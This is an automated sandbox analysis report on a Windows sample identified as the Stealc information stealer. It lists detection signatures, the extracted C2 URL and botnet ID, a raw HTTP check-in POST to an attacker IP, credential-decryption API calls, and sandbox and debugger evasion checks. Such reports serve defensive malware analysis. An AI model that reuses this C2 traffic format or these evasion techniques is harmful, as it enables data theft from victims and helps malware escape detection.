Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1522427
MD5:dc92ce1751a7abfe2c6232ae8fcdd321
SHA1:dccd40639ea30f104ff1daf9d51f6f8e76efc2ed
SHA256:16302289d512b8fbc68c2ef8eb4d3bcebdc7f5bf353785390a14d4c5dfbee672
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6780 cmdline: "C:\Users\user\Desktop\file.exe" MD5: DC92CE1751A7ABFE2C6232AE8FCDD321)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1823830492.0000000000E2E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.1781255600.0000000004AC0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6780JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6780JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.6d0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-30T03:24:10.566762+020020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.6d0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Multi AV Scanner detection for domain / URL
                Source: http://185.215.113.37/e2b1563c6670f193.phpoVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.phpwVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.phpcVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/wsVirustotal: Detection: 16%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_006DC820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_006D7240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_006D9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_006D9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_006E8EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_006E38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_006E4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_006DDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_006DE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_006E4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_006DED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_006DBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_006DDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_006D16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_006E3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_006DF6B0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AECAECFCAAEBFHIEHDGHHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 36 38 30 30 37 41 34 34 41 42 42 38 38 33 38 38 34 31 37 39 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 2d 2d 0d 0a Data Ascii: ------AECAECFCAAEBFHIEHDGHContent-Disposition: form-data; name="hwid"A68007A44ABB883884179------AECAECFCAAEBFHIEHDGHContent-Disposition: form-data; name="build"doma------AECAECFCAAEBFHIEHDGH--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_006D4880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AECAECFCAAEBFHIEHDGHHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 36 38 30 30 37 41 34 34 41 42 42 38 38 33 38 38 34 31 37 39 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 2d 2d 0d 0a Data Ascii: ------AECAECFCAAEBFHIEHDGHContent-Disposition: form-data; name="hwid"A68007A44ABB883884179------AECAECFCAAEBFHIEHDGHContent-Disposition: form-data; name="build"doma------AECAECFCAAEBFHIEHDGH--
                Source: file.exe, 00000000.00000002.1823830492.0000000000E2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1823830492.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1823830492.0000000000E88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1823830492.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1823830492.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1823830492.0000000000EA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1823830492.0000000000E88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpWHjj
                Source: file.exe, 00000000.00000002.1823830492.0000000000E72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpc
                Source: file.exe, 00000000.00000002.1823830492.0000000000E72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpo
                Source: file.exe, 00000000.00000002.1823830492.0000000000E88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpot:j
                Source: file.exe, 00000000.00000002.1823830492.0000000000E72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpw
                Source: file.exe, 00000000.00000002.1823830492.0000000000E88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws
                Source: file.exe, 00000000.00000002.1823830492.0000000000E2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37_

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3A8E00_2_00A3A8E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A988040_2_00A98804
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AA29A00_2_00AA29A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AAC9E20_2_00AAC9E2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009419F90_2_009419F9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A5C12D0_2_00A5C12D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A9DA810_2_00A9DA81
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A832120_2_00A83212
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AA7A100_2_00AA7A10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A96CCC0_2_00A96CCC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AA94180_2_00AA9418
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0097D4470_2_0097D447
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AA44450_2_00AA4445
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A255B10_2_00A255B1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A9BD9F0_2_00A9BD9F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A9ADDD0_2_00A9ADDD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A9F51A0_2_00A9F51A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A96900_2_009A9690
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A126210_2_00A12621
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AAE6750_2_00AAE675
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AE9F940_2_00AE9F94
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AAAF020_2_00AAAF02
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AA5F450_2_00AA5F45
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 006D45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: mljpawsw ZLIB complexity 0.9949790936381265
                Source: file.exe, 00000000.00000003.1781255600.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_006E9600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_006E3720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\IA2D82I6.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1872384 > 1048576
                Source: file.exeStatic PE information: Raw size of mljpawsw is bigger than: 0x100000 < 0x1a3000

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.6d0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;mljpawsw:EW;uqwudrny:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;mljpawsw:EW;uqwudrny:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_006E9860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1ce329 should be: 0x1d4801
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: mljpawsw
                Source: file.exeStatic PE information: section name: uqwudrny
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B128B0 push edi; mov dword ptr [esp], 32C15E17h0_2_00B128CC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5E8BD push 23C5D312h; mov dword ptr [esp], edx0_2_00B5E8F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B458A2 push 12BD7497h; mov dword ptr [esp], esi0_2_00B458DC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B96893 push ebx; mov dword ptr [esp], eax0_2_00B968CD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3A8E0 push eax; mov dword ptr [esp], 34431B00h0_2_00A3A91E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3A8E0 push 1B2960E2h; mov dword ptr [esp], edx0_2_00A3A9E4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3A8E0 push edi; mov dword ptr [esp], esi0_2_00A3AA36
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006EB035 push ecx; ret 0_2_006EB048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A200CB push eax; mov dword ptr [esp], edx0_2_00A20115
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A200CB push 385D50E6h; mov dword ptr [esp], eax0_2_00A20129
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A200CB push ebp; mov dword ptr [esp], edx0_2_00A2014A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A200CB push 77A457C7h; mov dword ptr [esp], ebp0_2_00A20152
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A200CB push ecx; mov dword ptr [esp], edx0_2_00A2016D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A200CB push eax; mov dword ptr [esp], ebx0_2_00A20183
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A200CB push ebx; mov dword ptr [esp], 0C929AD6h0_2_00A2020E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A200CB push 21AC689Ch; mov dword ptr [esp], ebp0_2_00A2027D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A200CB push ebx; mov dword ptr [esp], 42EC8EB7h0_2_00A20297
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B348C2 push 38DF81A9h; mov dword ptr [esp], ebp0_2_00B348ED
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B348C2 push 4AFC60CCh; mov dword ptr [esp], edx0_2_00B34917
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B0D812 push 471DEB10h; mov dword ptr [esp], edx0_2_00B0D82E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AE2809 push edi; mov dword ptr [esp], ecx0_2_00AE284D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A98804 push 46E2FAFAh; mov dword ptr [esp], edi0_2_00A98886
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A98804 push eax; mov dword ptr [esp], edx0_2_00A9888A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A98804 push esi; mov dword ptr [esp], 4E3462E7h0_2_00A988C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A98804 push 5F312100h; mov dword ptr [esp], ecx0_2_00A98900
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A98804 push 4BD14633h; mov dword ptr [esp], edx0_2_00A98947
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A98804 push edi; mov dword ptr [esp], edx0_2_00A989CF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A98804 push ecx; mov dword ptr [esp], 10FE7072h0_2_00A989D3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A98804 push edx; mov dword ptr [esp], 22DF19C8h0_2_00A989E8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A98804 push edi; mov dword ptr [esp], eax0_2_00A98AC6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A98804 push 450C76ABh; mov dword ptr [esp], eax0_2_00A98B12
                Source: file.exeStatic PE information: section name: mljpawsw entropy: 7.954150449631776

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_006E9860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13644
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB3544 second address: AB356F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C742FAh 0x00000007 jbe 00007F33B8C742F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jne 00007F33B8C742FEh 0x00000015 jbe 00007F33B8C74309h 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB25FE second address: AB2602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2B9D second address: AB2BA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB5C97 second address: AB5C9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
